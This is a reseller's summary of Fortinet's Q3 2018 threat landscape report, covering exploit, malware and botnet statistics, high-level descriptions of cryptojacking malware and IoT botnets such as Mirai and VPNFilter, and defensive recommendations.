Threat Landscape Report Q3 2018 – Fortinet

Protect your business from increased cyber threats and attacks.

Read Fortinet’s quarterly review of the cyber-threat landscape.
Fusion partners with global security expert Fortinet to provide clients with end-to-end security. Fortinet gives useful perspectives on the global threat landscape that businesses can take action on in their local environment.

Here are some summaries in the Report.

Quick Stats for Q3: Exploits
§ Exploit Index rose 2%
§ 7,925 unique exploits detected
§ 1,114 detections per firm
§ 65.4% of firms saw severe exploits
§ IoT exploits increased in prevalence
§ 20 zero days found by FortiGuard Labs

Quick Stats for Q3: Malware
§ Malware Index rose 4%
§ 34,148 unique variants detected
§ 21 unique daily detections per firm
§ 4 variants spread to ≥10% of firms
§ 19% saw cryptojacking malware
§ 26% reported mobile malware

Whereas exploit and malware trends usually show the pre-compromise side of attacks, botnets give a post-compromise viewpoint. Once infected, systems often communicate with remote malicious hosts, and such traffic in a corporate environment indicates something went wrong. That makes this dataset valuable from a “learning from our mistakes” perspective.
The Botnet Index for the quarter trended up, but not quite as much as the overall TLI. Botnets differ from exploits and malware in that the most prevalent botnets remain relatively static from quarter to quarter. In fact, the top seven botnets from Q2 are the exact same for Q3, with one minor change in ordering (Sality moved from No. 7 to No. 5). That kind of consistency is fairly remarkable when you think about the dynamic nature of the cyber-threat landscape.

Quick Stats for Q3: 

§ 257 unique botnets detected
§ 10.2 infection days per firm
§ 3.2% of firms saw ≥10 bots
§ 58% of infections lasted 1 day
§ 4% of infections lasted >1 week

§ Economic dynamics driving the development of ransomware, cryptojacking, and other crimeware
§ Evolution of rapid malware development through code reuse, agile approaches, and other methods
§ Continued rise of destructive threats and the changing impact on business risk and resiliency
§ Evolution of attacks targeting critical infrastructure and IoT devices


When we look back at 2018, cryptojacking will almost certainly be in the running for “Threat of the Year” recognition. But because
cryptojacking doesn’t attempt to steal data, wipe the system, or deliver some other malicious payload, not everyone views it as a
critical threat to their organization. We’re all for prioritization of threats based on risk to the business, but what many don’t realize is that
cryptojacking malware often compromises the defenses of systems under its sway. Below are some examples of this malicious activity.2
§ PowerGhost alters preferences for system scans and updates and disables Windows Defender through the registry. It has also been
observed downloading a DDoS tool.
§ PyRoMine creates a backdoor account called “Default” so attackers can gain remote access with admin privileges. It enables RDP and
opens up the RDP port in the Windows Firewall. It also disables services, deletes net users, and kills processes.
§ Adylkuzz has functionality to change firewall rules and kill processes like the Microsoft Management Console. It also stops and deletes
the Event Log Management service.
§ RubyMiner clears out all cron jobs and schedules a cron job for itself. Because of this, scripts or programs—including those with
security functionality—could be wiped out.
§ The Jenkins miner is perhaps the most interesting. It downloads and runs a Linux binary that remains a mystery since no one was able to obtain a copy. It could be a different miner or it could be a random Linux rootkit to hide itself. Speaking of hiding, Jenkins can fake its process name to appear as “/usr/sbin/sshd” in the list of running processes.
Beyond these examples, we see a strong correlation between cryptojacking and other types of malware in our dataset

IoT botnets rose to notoriety in September 2016 with the advent of Mirai and the 600,000 infected IoT devices under its control. Mirai’s source code was released to the public the following month for unknown reasons. This has led to more powerful variants of Mirai such as Satori, JenX, OMG, and Wicked.

Recent Developments
Mirai’s main method of propagation was finding IoT devices and then brute forcing the target’s login credentials. Over time this morphed into vulnerability exploitation of IoT devices. For example, Reaper targeted many IoT device vulnerabilities on vendors such as NETGEAR, GoAhead, Linksys, and AVTECH. It contained an LUA engine that leveraged scripts to run its exploits, making it very easy to swap exploits in and out. Nowadays it is common for IoT botnets to have multiple exploits for many IoT devices at its disposal.

Another new development in current botnets is the trend of decentralized command-and-control infrastructure via peer-to-peer (P2P)
protocol communication. The exact P2P protocol used depends on the botnet, with some using existing protocols and others relying on
custom-built protocols. The advantages of a decentralized command-and-control infrastructure are twofold: first, they make the botnet
more resilient to takedown attempts, and second, they allow the botnets to spread far more rapidly.

The previously mentioned variant OMG turns infected devices into proxy servers that can be rented to individuals looking for inconspicuousness via multiple proxies. IoT botnets have also begun to implant cryptojacking malware in infected IoT devices. Another
risk posed by IoT botnets is the potential for infected devices to be rendered useless. This includes everything from smart TVs and coffee
machines to medical devices.

An example of an IoT botnet targeting an entire country is VPNFilter and its attack on Ukraine. Devices infected with VPNFilter were laced
with a kill switch that allowed the destruction of said device with a single command. Additionally, the capability for the botnet to spread via
injecting malicious code into network sessions gave it the ability to infect endpoint devices.

Future Directions
IoT botnets will continue to evolve and grow. A possible avenue for this growth is the application of machine learning or data analytics to botnets, allowing it to refine itself by finding the most efficient exploits and the most vulnerable devices.
Defense against IoT botnets is challenging to say the least. Fortinet recommends pursuing options such as off-site storage of system
backups, having redundant systems, keeping devices updated, segmenting networks between IoT devices and production network, monitoring traffic between these segments, and utilizing real-time threat intelligence.


FORTINET summary of recommendations inspired by trends discussed in the Q3 Report.

Connect with THEcy FortiGuard Labs teamat @FortiGuardLabs or with the hashtag #FortiResearch. You can also find us at @Fortinet and @FortinetPartner for the latest business and cybersecurity insights.